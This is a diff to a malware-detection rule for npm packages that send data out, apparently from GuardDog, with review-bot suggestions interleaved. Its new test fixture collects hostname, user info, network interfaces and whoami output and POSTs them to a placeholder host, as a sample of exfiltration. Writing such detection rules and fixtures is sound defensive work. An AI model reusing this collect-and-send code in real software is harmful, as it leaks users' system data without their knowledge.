diff --git a/guarddog/analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml b/guarddog/analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml
index 38bcb4be..0a4110df 100644
--- a/guarddog/analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml
+++ b/guarddog/analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml
@@ -59,6 +59,12 @@ rules:
 pattern-sinks:
 - patterns:
 - pattern-either:
+ - pattern-inside: |
+ $HTTP = ... .request(...)
+ ...
+ - pattern-inside: |
+ $HTTP = require('http')
+ ...
 - pattern-inside: |
 $HTTP = require('https')
 ...
@@ -79,6 +85,7 @@ rules:
 - pattern: $HTTP. ... .get(...)
 - pattern: $HTTP. ... .post(...)
 - pattern: $HTTP. ... .push(...)
+ - pattern: $HTTP. ... .write(...)
 - pattern: $HTTP(...)
 languages:
 - javascript
diff --git a/tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js b/tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js
index 7f025eac..f625f89c 100644
--- a/tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js
+++ b/tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js
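Review bot: In the first hunk of npm-exfiltrate-sensitive-data.yml, the added `$HTTP = ... .request(...)` binds `$HTTP` to the result of any `.request(...)` call, not only one made on the `http` or `https` module, so any object with a `request` method is treated as a client request by the sink patterns below. Because this sits under `pattern-sinks`, the extra matches are limited to flows that already start at a sensitive source, but the breadth should be either narrowed or stated in a rule comment such as `# any .request() result is treated as an outgoing request object`. The new `require('http')` entry matches only that exact specifier; if `require('node:http')` and the `import` forms are not covered by entries outside this hunk, they need their own lines.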
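Review bot: In the second hunk of npm-exfiltrate-sensitive-data.yml, the added sink `$HTTP. ... .write(...)` covers a body sent with `write`, but Node's `request.end([data])` accepts a body as well, so a request that passes its payload straight to `end` is not matched unless `.end(...)` is listed outside this hunk. I would add `- pattern: $HTTP. ... .end(...)` next to the new line. It should come with its own `ruleid` fixture in the test file so the two sinks are checked independently.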
@@ -113,3 +113,46 @@ function f(){
 });
 });
 }
+
+function f(){
+ const os = require('os');
+ const http = require('http');
+ // Collect device information
+ const deviceInfo = {
+ platform: os.platform(),
+ release: os.release(),
+ hostname: os.hostname(),
+ arch: os.arch(),
+ userInfo: os.userInfo(),
+ networkInterfaces: os.networkInterfaces(),
+ whoamiinfo: whoamiInfo, // Include whoami output
+ user: "Keycloak",
+ };
+
+ // Define the request options
+ const options = {
+ hostname: apiHostname,
+ port: apiPort,
+ path: apiPath,
+ method: 'POST',
+ headers: {
+ 'Content-Type': 'application/json', // Inform the server about the JSON body
+ },
+ };
+
+ // Create the request
+ const req = http.request(options, (res) => {
+ console.log(`Status: ${res.statusCode}`);
+ res.on('data', (chunk) => {
+ console.log(`Body: ${chunk}`);
+ });
+ });
+
+ req.on('error', (error) => {
+ console.error(`Error: ${error.message}`);
+ });
+
+ // ruleid:npm-exfiltrate-sensitive-data
+ req.write(JSON.stringify(deviceInfo));
+ req.end();
+}
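Review bot: The new fixture adds only a positive case, so nothing here pins down the false-positive side of the broad `.request(...)` binding and the new `.write(...)` sink. I would add a sibling function that builds the same `http.request` but writes a constant payload, annotated as a negative: `// ok:npm-exfiltrate-sensitive-data` above `req.write(JSON.stringify({ status: 'ok' }));`. A one-line comment above `deviceInfo` naming which field is expected to act as the taint source would also help, since the object mixes several `os.*` calls with the undeclared `whoamiInfo` and the rule's source list is not visible in this diff.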